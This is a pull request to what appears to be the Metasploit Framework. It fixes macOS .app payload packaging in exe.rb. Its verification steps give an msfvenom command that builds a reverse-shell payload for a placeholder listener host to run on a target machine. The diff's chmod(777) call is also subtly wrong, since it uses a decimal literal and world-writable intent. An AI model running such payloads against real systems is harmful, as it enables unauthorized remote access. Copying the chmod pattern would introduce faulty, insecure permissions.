### PR TITLE
Fix bug in osx-app creation

### DIFF
--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -854,6 +854,13 @@ require 'msf/core/exe/segment_appender'
     hidden      = opts.fetch(:hidden, true)
     plist_extra = opts.fetch(:plist_extra, '')
 
+    # The app won't execute if the macho isn't executable
+    macho = File.new(exe_name, 'w')
+    macho.write(exe)
+    macho.close
+    FileUtils.chmod(777, macho)
+
+
     app_name.chomp!(".app")
     app_name += ".app"
 
@@ -884,6 +891,8 @@ require 'msf/core/exe/segment_appender'
 </plist>
     |
 
+
+
     zip = Rex::Zip::Archive.new
     zip.add_file("#{app_name}/", '')
     zip.add_file("#{app_name}/Contents/", '')
@@ -892,6 +901,7 @@ require 'msf/core/exe/segment_appender'
     zip.add_file("#{app_name}/Contents/MacOS/#{exe_name}", exe)
     zip.add_file("#{app_name}/Contents/Info.plist", info_plist)
     zip.add_file("#{app_name}/Contents/PkgInfo", 'APPLaplt')
+    File.delete(exe_name)
     zip.pack
   end
 


### PR DESCRIPTION
Addressing #7703. I originally thought this bug was a problem with the macho architecture, but I figured out that:

1. The outputted file from msfvenom (`osx-app`) is a ___zip___ file, not an app file (which I personally think should be mentioned after generation)
2. The app wouldn't run unless the binary in `Contents/MacOS` was chmod'd (`777` maybe `755`) 

## Verification

List the steps needed to make sure this thing works

- [ ] Do start a handler (payload: `osx/x64/shell_reverse_tcp`)
- [ ] Do `msfvenom -p osx/x64/shell_reverse_tcp LHOST=<lhost> LPORT=<lport> -f osx-app -o out`
- [ ] Unzip out
- [ ] Run the unzipped app on the target machine
- [ ] **Verify** that you get a shell
- [ ] **Verify** that it works with all osx payloads

## Old problems

- Command to generate app

![](http://i.imgur.com/4iHgBMF.png)

- Old generated app 

![](http://i.imgur.com/JcyVeqc.png)

- Error from running app

![](http://i.imgur.com/0Tlqdwr.png)